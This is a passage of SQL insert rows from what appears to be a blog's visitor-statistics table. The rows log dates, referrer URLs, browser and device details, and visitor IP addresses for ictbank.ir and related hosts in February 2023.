(28524,'2023-02-04','http://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.223.197.105','000',0,3,0),
(28525,'2023-02-05','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(28526,'2023-02-05','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,14,0),
(28527,'2023-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,4,0),
(28528,'2023-02-05','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(28529,'2023-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(28530,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','143.244.136.65','000',0,2,0),
(28531,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28532,'2023-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28533,'2023-02-05','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28534,'2023-02-05','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.136.252','000',0,2,0),
(28535,'2023-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28536,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.218.242.154','000',0,2,0),
(28537,'2023-02-05','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,2,0),
(28538,'2023-02-05','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28539,'2023-02-05','http://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','154.89.5.36','000',0,1,0),
(28540,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','154.89.5.37','000',0,1,0),
(28541,'2023-02-05','http://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','152.32.135.231','000',0,1,0),
(28542,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.24.32.13','000',0,1,0),
(28543,'2023-02-05','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,4,0),
(28544,'2023-02-05','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.155.60.8','000',0,3,0),
(28545,'2023-02-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(28546,'2023-02-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.218.44','000',0,1,0),
(28547,'2023-02-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28548,'2023-02-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28549,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','54.208.37.30','000',0,2,0),
(28550,'2023-02-05','https://www.bing.com/','Edge','Windows','109.0.0.0','desktop','Unknown','','92.191.101.176','000',0,1,0),
(28551,'2023-02-05','http://45.92.94.221:80/blog','Quark Browser','Android','5.0.0.0','mobile:smart','Unknown','','173.212.243.253','000',0,1,0),
(28552,'2023-02-05','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.145','000',0,2,0),
(28553,'2023-02-05','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.165.190.34','000',0,2,0),
(28554,'2023-02-05','https://www.google.com/','Firefox','OS X','110.0','desktop','Macintosh','','95.90.193.139','000',0,1,0),
(28555,'2023-02-05','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(28556,'2023-02-06','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,18,0),
(28557,'2023-02-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','212.83.180.245','000',0,2,0),
(28558,'2023-02-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28559,'2023-02-06','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(28560,'2023-02-06','http://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','185.119.81.108','000',0,6,0),
(28561,'2023-02-06','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.92.87.143','000',0,2,0),
(28562,'2023-02-06','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(28563,'2023-02-06','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,2,0),
(28564,'2023-02-06','http://ictbank.ir/blog','Firefox','Linux','102.0','desktop','Unknown','','51.89.201.226','000',0,9,0),
(28565,'2023-02-06','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.113.106.74','000',0,4,0),
(28566,'2023-02-06','http://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(28567,'2023-02-06','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.218.210.9','000',0,2,0),
(28568,'2023-02-06','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','110.93.205.130','000',0,1,0),
(28569,'2023-02-06','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','188.83.98.134','000',0,1,0),
(28570,'2023-02-06','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28571,'2023-02-06','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.165.251.188','000',0,1,0),
(28572,'2023-02-06','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.239','000',0,1,0),
(28573,'2023-02-06','http://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,2,0),
(28574,'2023-02-06','http://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(28575,'2023-02-06','http://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(28576,'2023-02-06','http://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,2,0),
(28577,'2023-02-06','http://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(28578,'2023-02-06','http://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(28579,'2023-02-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28580,'2023-02-06','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.146','000',0,2,0),
(28581,'2023-02-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(28582,'2023-02-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(28583,'2023-02-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(28584,'2023-02-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(28585,'2023-02-06','http://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','162.221.197.233','000',0,2,0),
(28586,'2023-02-06','http://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(28587,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,8,0),
(28588,'2023-02-07','http://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','65.108.211.119','000',0,7,0),
(28589,'2023-02-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(28590,'2023-02-07','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.145','000',0,2,0),
(28591,'2023-02-07','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','109.239.58.107','000',0,2,0),
(28592,'2023-02-07','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','61.19.211.252','000',0,1,0),
(28593,'2023-02-07','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(28594,'2023-02-07','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.99.104','000',0,2,0),
(28595,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,1,0),
(28596,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.44','000',0,6,0),
(28597,'2023-02-07','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(28598,'2023-02-07','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(28599,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,8,0),
(28600,'2023-02-07','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','151.236.221.19','000',0,2,0),
(28601,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,5,0),
(28602,'2023-02-07','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.160.105.19','000',0,2,0),
(28603,'2023-02-07','https://www.google.com/','Firefox','Linux','103.0','desktop','Unknown','','180.244.166.181','000',0,1,0),
(28604,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.30','000',0,1,0),
(28605,'2023-02-07','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','193.201.192.193','000',0,1,0),
(28606,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.54','000',0,5,0),
(28607,'2023-02-07','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(28608,'2023-02-07','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,2,0),
(28609,'2023-02-07','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','221.212.178.16','000',0,1,0),
(28610,'2023-02-07','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','119.60.104.38','000',0,1,0),
(28611,'2023-02-07','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.200.20.61','000',0,2,0),
(28612,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,5,0),
(28613,'2023-02-07','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.56.218','000',0,1,0),
(28614,'2023-02-07','http://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','43.142.237.137','000',0,6,0),
(28615,'2023-02-07','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','128.1.132.73','000',0,1,0),
(28616,'2023-02-07','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.209.82.29','000',0,2,0),
(28617,'2023-02-07','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.57','000',0,6,0),
(28618,'2023-02-07','http://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','86.107.158.168','000',0,3,0),
(28619,'2023-02-07','http://design-arena.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.221.186.26','000',0,2,0),
(28620,'2023-02-07','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(28621,'2023-02-07','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28622,'2023-02-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(28623,'2023-02-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.177.129','000',0,1,0),
(28624,'2023-02-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28625,'2023-02-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28626,'2023-02-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(28627,'2023-02-07','http://www.neginghavami.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.27','000',0,1,0),
(28628,'2023-02-07','http://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','185.119.81.102','000',0,2,0),
(28629,'2023-02-07','http://neginghavami.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,4,0),
(28630,'2023-02-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(28631,'2023-02-07','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.125.77','000',0,2,0),
(28632,'2023-02-08','http://neginghavami.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,2,0),
(28633,'2023-02-08','http://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(28634,'2023-02-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.24','000',0,6,0),
(28635,'2023-02-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.58','000',0,5,0),
(28636,'2023-02-08','http://design-arena.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','176.74.192.85','000',0,2,0),
(28637,'2023-02-08','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(28638,'2023-02-08','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,1,0),
(28639,'2023-02-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.40','000',0,8,0),
(28640,'2023-02-08','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(28641,'2023-02-08','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.33.207.37','000',0,2,0),
(28642,'2023-02-08','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','154.92.126.97','000',0,1,0),
(28643,'2023-02-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.29','000',0,1,0),
(28644,'2023-02-08','http://ictbank.ir/blog','Chrome','Windows','48.0.0.0','desktop','Unknown','','185.119.81.102','000',0,8,0),
(28645,'2023-02-08','http://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.73','000',0,3,0),
(28646,'2023-02-08','https://www.google.com/','Chrome','Linux','109.0.0.0','desktop','Unknown','','106.210.167.123','000',0,1,0),
(28647,'2023-02-08','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,2,0),
(28648,'2023-02-08','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28649,'2023-02-08','http://ictbank.ir','Firefox','Windows','80.0','desktop','Unknown','','45.129.56.207','000',0,1,0),
(28650,'2023-02-08','http://45.92.94.221/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.192.202','000',0,2,0),
(28651,'2023-02-08','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.88.227.1','000',0,1,0),
(28652,'2023-02-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(28653,'2023-02-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.190.134.69','000',0,2,0),
(28654,'2023-02-08','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.159','000',0,1,0),
(28655,'2023-02-08','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.26','000',0,1,0),
(28656,'2023-02-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28657,'2023-02-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(28658,'2023-02-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(28659,'2023-02-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28660,'2023-02-08','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28661,'2023-02-08','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','54.83.241.95','000',0,1,0),
(28662,'2023-02-08','https://www.google.com/','Chrome','Android','109.0.0.0','mobile:smart','Redmi Note 9S','','213.163.125.223','000',0,1,0),
(28663,'2023-02-09','http://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(28664,'2023-02-09','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28665,'2023-02-09','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28666,'2023-02-09','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(28667,'2023-02-09','http://ns2.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.91','000',0,1,0),
(28668,'2023-02-09','http://ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','37.120.172.141','000',0,2,0),
(28669,'2023-02-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.254.37.198','000',0,1,0),
(28670,'2023-02-09','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(28671,'2023-02-09','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.131.55','000',0,2,0),
(28672,'2023-02-09','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,2,0),
(28673,'2023-02-09','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(28674,'2023-02-09','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,7,0),
(28675,'2023-02-09','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.34.233.109','000',0,2,0),
(28676,'2023-02-09','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.170.185.20','000',0,1,0),
(28677,'2023-02-09','http://45.92.94.221/blog','Firefox','Windows','79.0','desktop','Unknown','','164.52.25.251','000',0,1,0),
(28678,'2023-02-09','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.66.124','000',0,1,0),
(28679,'2023-02-09','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','147.161.191.103','000',0,1,0),
(28680,'2023-02-09','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(28681,'2023-02-09','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(28682,'2023-02-09','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.188.128.20','000',0,1,0),
(28683,'2023-02-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','159.223.207.102','000',0,2,0),
(28684,'2023-02-09','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.237.27.226','000',0,1,0),
(28685,'2023-02-09','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','23.229.113.138','000',0,3,0),
(28686,'2023-02-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.218.44','000',0,1,0),
(28687,'2023-02-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.119.6','000',0,1,0),
(28688,'2023-02-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(28689,'2023-02-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(28690,'2023-02-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(28691,'2023-02-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(28692,'2023-02-10','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.78','000',0,1,0),
(28693,'2023-02-10','http://45.92.94.221:80/blog','Swiftfox','Linux','Unknown','desktop','Unknown','','40.113.160.8','000',0,2,0),
(28694,'2023-02-10','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(28695,'2023-02-10','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','115.91.67.244','000',0,1,0),
(28696,'2023-02-10','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.188','000',0,1,0),
(28697,'2023-02-10','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.9','000',0,4,0),
(28698,'2023-02-10','http://45.92.94.221:80/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S5','','20.115.47.129','000',0,2,0),
(28699,'2023-02-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(28700,'2023-02-10','http://www.neginghavami.ir/blog','Firefox','Windows','109.0','desktop','Unknown','','198.244.140.11','000',0,1,0),
(28701,'2023-02-10','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Firefox','Windows','50.0','desktop','Unknown','','49.212.209.101','000',0,3,0),
(28702,'2023-02-10','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,2,0),
(28703,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(28704,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.32.24','000',0,2,0),
(28705,'2023-02-10','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28706,'2023-02-10','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','53.0.0.0','desktop','Unknown','','185.119.81.102','000',0,2,0),
(28707,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','94.0.0.0','desktop','Unknown','','45.41.141.197','000',0,3,0),
(28708,'2023-02-10','https://ictbank.ir/blog','Chrome','Android','68.0.0.0','mobile:smart','G6','','107.173.224.62','000',0,1,0),
(28709,'2023-02-10','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','213.152.250.204','000',0,1,0),
(28710,'2023-02-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(28711,'2023-02-10','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','65.109.166.111','000',0,4,0),
(28712,'2023-02-10','https://ictbank.ir/blog','Chrome','Android','109.0.0.0','mobile:smart','Mi 11T','','135.125.45.88','000',0,1,0),
(28713,'2023-02-10','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','65.108.242.241','000',0,4,0),
(28714,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','94.0.0.0','desktop','Unknown','','161.0.2.39','000',0,43,0),
(28715,'2023-02-10','https://ictbank.ir/blog','Chrome','Android','68.0.0.0','mobile:smart','G6','','89.33.117.180','000',0,1,0),
(28716,'2023-02-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(28717,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(28718,'2023-02-10','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','65.109.6.47','000',0,4,0),
(28719,'2023-02-10','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','35.173.191.32','000',0,1,0),
(28720,'2023-02-10','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','65.21.60.127','000',0,4,0),
(28721,'2023-02-10','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','135.181.145.123','000',0,4,0),
(28722,'2023-02-10','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28723,'2023-02-10','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.14.232','000',0,1,0),
(28724,'2023-02-10','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.101.3','000',0,1,0),
(28725,'2023-02-10','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.193.239','000',0,1,0),
(28726,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.104','000',0,2,0),
(28727,'2023-02-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,1,0),
(28728,'2023-02-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(28729,'2023-02-11','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(28730,'2023-02-11','https://ictbank.ir/blog','Chrome','Android','43.0.0.0','mobile:smart','Optimus L3 II','','212.78.94.90','000',0,1,0),
(28731,'2023-02-11','https://ictbank.ir/blog','Chrome','Android','43.0.0.0','mobile:smart','Optimus L3 II','','46.101.196.198','000',0,1,0),
(28732,'2023-02-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(28733,'2023-02-11','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(28734,'2023-02-11','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','144.126.151.207','000',0,10,0),
(28735,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','65.109.6.47','000',0,2,0),
(28736,'2023-02-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.144.143','000',0,1,0),
(28737,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','65.109.166.111','000',0,3,0),
(28738,'2023-02-11','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.100','000',0,1,0),
(28739,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','65.109.7.168','000',0,1,0),
(28740,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','65.21.60.127','000',0,1,0),
(28741,'2023-02-11','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
